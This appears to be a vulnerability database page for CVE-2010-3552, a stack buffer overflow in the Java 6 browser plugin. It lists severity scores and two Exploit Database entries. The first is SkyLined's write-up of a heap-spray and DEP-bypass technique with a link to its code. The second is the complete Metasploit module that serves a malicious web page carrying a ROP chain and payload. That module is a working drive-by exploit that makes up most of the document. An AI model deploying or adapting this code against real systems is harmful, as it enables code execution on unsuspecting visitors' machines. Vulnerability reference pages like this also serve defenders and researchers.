Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE Other |
No informations. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 15241
Publication date : 2010-10-12 22h00 +00:00
Author : Skylined
EDB Verified : Yes
Source: http://code.google.com/p/skylined/issues/detail?id=23
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
,dSSSSSSSSSSSS SSSS ,dSSY' SSSS SSSS SSSS SSSS SSSSb, SSSS ,dSSSSSSSSSSSS SSSSSSSSSSSSb,
SSSS SSSS ,dSSY' SSSS SSSS SSSS SSSS SSSSSSb, SSSS SSSS SSSS SSSS
'YSSSSSSSSSSb, SSSSSSSSSSSSb, 'YSSSSSSSSSSSS SSSS SSSS SSSS'YSSb,SSSS SSSSSSSSSSS SSSS SSSS
SSSS SSSS SSSS SSSS SSSS SSSS SSSS 'YSSSSSS SSSS SSSS SSSS
SSSSSSSSSSSSP' SSSS SSSS SSSSSSSSSSSSP' 'YSSSSSSSSSS SSSS SSSS 'YSSSS 'YSSSSSSSSSSSS SSSS SSSSSSP'
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
Internet Exploiter 12+DEP: Oracle Java 6 OBJECT tag "launchjnlp"/"docbase" param buffer overflow exploit.
Copyright (c) 2010 Berend-Jan "SkyLined" Wever <
[email protected]>
All rights reserved. This information is provided for academic purpose only.
This exploit targets a stack based buffer overflow in Oracle Java 6. The vulnerability has been confirmed in Update 20
and 21 and it probably exists in earlier version as well. The overflow allows control over the EBP and EIP registers
when the vulnerable code returns.
This exploit tries to bypasss DEP using the "Havoc" mechanism first published at
http://skypher.com/index.php/2010/03/01/internet-exploiter-2-dep/. This is a combination of a heap spray and a
ret-into-libc attack that tries to set the executable flag on a block of memory in the heap spray before executing it.
After setting up the heap spray, the stack overflow in Java is used to overwrite EBP and EIP. EIP is pointed to any
LEAVE, RET instruction sequence in the code section of any loaded module at an address that can be encoded in the
buffer overflow string (characters [\x00\x80-\x9F] cannot be used!) The LEAVE instruction provides control over ESP,
which makes the ret-into-libc attack possible.
The ret-into-libc attack causes consecutive calls to ZwProtectVirtualMemory in ntdll. Each call tries to change the
memory protection flags for a memory region that should be covered by the heap spray and contain the shellcode.
Multiple calls are needed because the base address of the memory block that contains the shellcode is not know. One
call is made for each possible value, and therefore all but one of these calls should fail. After these calls, the
ret-into-lic stack returns to the shellcode, which by now should be executable because of the one call to
ZwProtectVirtualMemory that succeeded.
This exploit does not attempt to bypass ASLR. When testing on a target with ASLR enabled, you can provide the base
address of ntdll by appending "?iNtDllImageBase=0xXXXXXXXX" tot the url. Alternatively, you could try to find a way to
determine the base address of ntdll automatically or do a brute-force attack that tries all ~256 possible values
(hint, hint :D).
This exploit has been tested succcessfully on Windows XP sp3 en-us (x86), Windows Vista sp2 en-us (x86) and Windows 7
en-us (x64) and with MSIE 6.0, 7.0 and 8.0 using Java 6 Update 21.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of the contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15241.zip (iExploit12-DEP.zip)
Exploit Database EDB-ID : 16587
Publication date : 2011-01-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: java_docbase_bof.rb 11513 2011-01-08 00:25:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Java Runtime New Plugin docbase Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the new plugin component of the Sun Java
Runtime Environment before v6 Update 22. By specifying specific parameters
to the new plugin, an attacker can cause a stack-based buffer overflow and
execute arbitrary code.
When the new plugin is invoked with a "launchjnlp" parameter, it will
copy the contents of the "docbase" parameter to a stack-buffer using the
"sprintf" function. A string of 396 bytes is enough to overflow the 256
byte stack buffer and overwrite some local variables as well as the saved
return address.
NOTE: The string being copied is first passed through the "WideCharToMultiByte".
Due to this, only characters which have a valid localized multibyte
representation are allowed. Invalid characters will be replaced with
question marks ('?').
This vulnerability was originally discovered independently by both Stephen
Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't
been done, all versions since version 6 Update 10 are believed to be affected
by this vulnerability.
This vulnerability was patched as part of the October 2010 Oracle Patch
release.
},
'License' => MSF_LICENSE,
'Author' => 'jduck',
'Version' => '$Revision: 11513 $',
'References' =>
[
[ 'CVE', '2010-3552' ],
[ 'OSVDB', '68873' ],
[ 'BID', '44023' ],
[ 'URL', 'http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-206/' ],
[ 'URL', 'http://code.google.com/p/skylined/issues/detail?id=23' ],
[ 'URL', 'http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html' ],
],
'Platform' => 'win',
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
# The double quote is due to the html, the rest due to utf8 conversion crap.
'BadChars' => "\x00\x22" + (0x80..0x9f).to_a.pack('C*'),
'DisableNops' => true,
#'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX',
}
},
'Targets' =>
[
# Tested OK on:
# JRE 6u21 on XPSP3 and Win7-RTM
# JRE 6u18 on XPSP3 (ugly dialog on IE8)
# JRE 6u11 on XPSP3 (ugly dialog on IE8)
[ 'Windows Universal (msvcr71.dll ROP)', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 12 2010'
))
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}")
# ActiveX params
clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
var_obj = rand_text_alpha(8+rand(8))
# These addresses are from the bundled msvcr71.dll from JRE 6u21
=begin
7c340000 7c396000 MSVCR71 (export symbols) C:\Program Files\Java\jre6\bin\MSVCR71.dll
Loaded symbol image file: C:\Program Files\Java\jre6\bin\MSVCR71.dll
Image path: C:\Program Files\Java\jre6\bin\MSVCR71.dll
Image name: MSVCR71.dll
Timestamp: Fri Feb 21 07:42:20 2003 (3E561EAC)
CheckSum: 0005F1E9
ImageSize: 00056000
File version: 7.10.3052.4
Product version: 7.10.3052.4
=end
base = 0x7c340000
rva = {
'scratch' => 0x4b170, # Scratch space..
'scratch2' => 0x4b170 - 0x10, # Scratch space..
'import_VA' => 0x3a08c - 0x58, # The import address of HeapCreate (less 0x58, avoid badchars)
'add_58_eax' => 0xd05e, # add eax, 0x58 / ret
'pop_eax' => 0x4cc1, # pop eax / ret
'deref_eax' => 0x130ea, # mov eax, [eax] / ret
'deref_eax4' => 0xe72b, # mov eax, [eax+4] / ret
'jmp_eax' => 0x13ac, # push eax / ret
'jmp_ecx' => 0x6b0e, # jmp ecx
'pop_edx' => 0x5937, # pop edx / ret
'adjust_eax' => 0x32ef8, # add eax, 0x80bf / add dh, dh / ret
'rep_movsd' => 0x363f, # rep movsd / pop edi / pop esi / sub eax, eax / ret
'esp_to_esi' => 0x32f4f, # push esp / and al, 0x10 / mov [edx], ecx / pop esi / ret
'switcheroo' => 0x3427, # mov ecx, eax / mov eax, esi / pop esi / ret 0x10
'st_eax_ecx' => 0x103c8, # mov [ecx], eax / ret
'xor_ecx' => 0x1aa5f, # xor ecx, ecx / mov [eax+0xc], ecx / ret 4
'set_ecx_fd' => 0x1690b, # mov cl, 0xfe / dec ecx / ret
}
extra_insn = 'nop'
#extra_insn = 'int 3'
single_op = Metasm::Shellcode.assemble(Metasm::Ia32.new, <<-EOS).encode_string
#{extra_insn}
push ecx
pop edi
ret
EOS
# This is the ROP stack.
stack = [
# Load HeapCreate addr from IAT
'pop_eax',
0x41414141, # unused space..
0x41414141,
0x41414141,
0x41414141,
'import_VA', # becomes eax
'add_58_eax',
'deref_eax',
# call HeapCreate
'jmp_eax',
'adjust_eax', # eip after HeapCreate
0x01040110, # flOptions (gets & with 0x40005)
0x01010101, # dwInitialSize
0x01010101, # dwMaximumSize
# Move esp into esi
'pop_edx',
'scratch', # becomes edx
'esp_to_esi',
# Store a single-dword stub to our buffer
'switcheroo',
single_op.unpack('V').first, # becomes esi/eax
'deref_eax4',
0x41414141, # more unused space..
0x41414141,
0x41414141,
0x41414141,
'st_eax_ecx',
# Call our dword-stub
'jmp_ecx',
# Re-load ESP and save our Heap address to scratch (edx)
'esp_to_esi',
# Set ecx to something sane (for memcpy)
'pop_eax',
'scratch2',
'xor_ecx',
'set_ecx_fd',
0x41414141, # skipped by ret 0x4
# Do the memcpy!
'rep_movsd',
0x41414141, # becomes edi
0x41414141, # becomes esi
# Re-load our Heap pointer
'pop_eax',
'scratch',
'deref_eax',
# Adjust it to skip the non-payload parts
'add_58_eax',
# Execute it !
'jmp_eax',
# BOOO!
0x41414141
]
# Replace unused entries with randomness
stack = stack.map { |el|
if el.kind_of? String
base + rva[el]
elsif el == 0x41414141
rand_text(4).unpack('V').first
else
el
end
}.pack('V*')
# Create the overflow buffer
docbase = rand_text(392)
docbase << stack
docbase << rand_text(584 - docbase.length)
docbase << payload.encoded
# Generate the html page that will trigger the vuln.
html = <<-EOS
<html>
<body>Please wait...
<object id="#{var_obj}" classid="clsid:#{clsid}" width="0" height="0">
<PARAM name="launchjnlp" value="1">
<PARAM name="docbase" value="#{docbase}">
</object>
<embed type="application/x-java-applet" width="0" height="0" launchjnlp="1" docbase="#{docbase}" />
</body>
</html>
EOS
# Pow.
send_response_html(cli, html,
{
'Content-Type' => 'text/html',
'Pragma' => 'no-cache'
})
end
end
Products Mentioned
Configuraton 0
Sun>>Jre >> Version To (including) 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Sun>>Jre >> Version 1.6.0
Configuraton 0
Sun>>Jdk >> Version To (including) 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
Sun>>Jdk >> Version 1.6.0
References